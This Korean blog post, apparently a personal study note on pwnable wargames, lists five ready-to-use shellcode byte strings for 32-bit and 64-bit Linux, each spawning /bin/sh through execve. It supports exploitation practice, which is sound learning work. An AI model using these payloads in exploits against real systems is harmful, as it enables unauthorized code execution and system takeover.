본문 바로가기
[ ★ ]Study/PWNABLE

ShellCode

by nroses-taek 2019. 12. 5.

32-bit Operation

28-BYTE

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

 

31-BYTE

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

 

64-bit Operation

23-BYTE

\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05

 

27-BYTE

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

 

31-BYTE

\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05

'[ ★ ]Study > PWNABLE' 카테고리의 다른 글

쓰기 가능한 영역 찾기  (0) 2019.01.01
[TIP] 파이썬 쉘에서 인자 바로 넘기기  (0) 2019.01.01
ROP 쓰기 가능한 영역 확인  (0) 2018.12.07
ROPgadget 이용  (0) 2018.12.05
Calling Convention  (0) 2018.12.05

댓글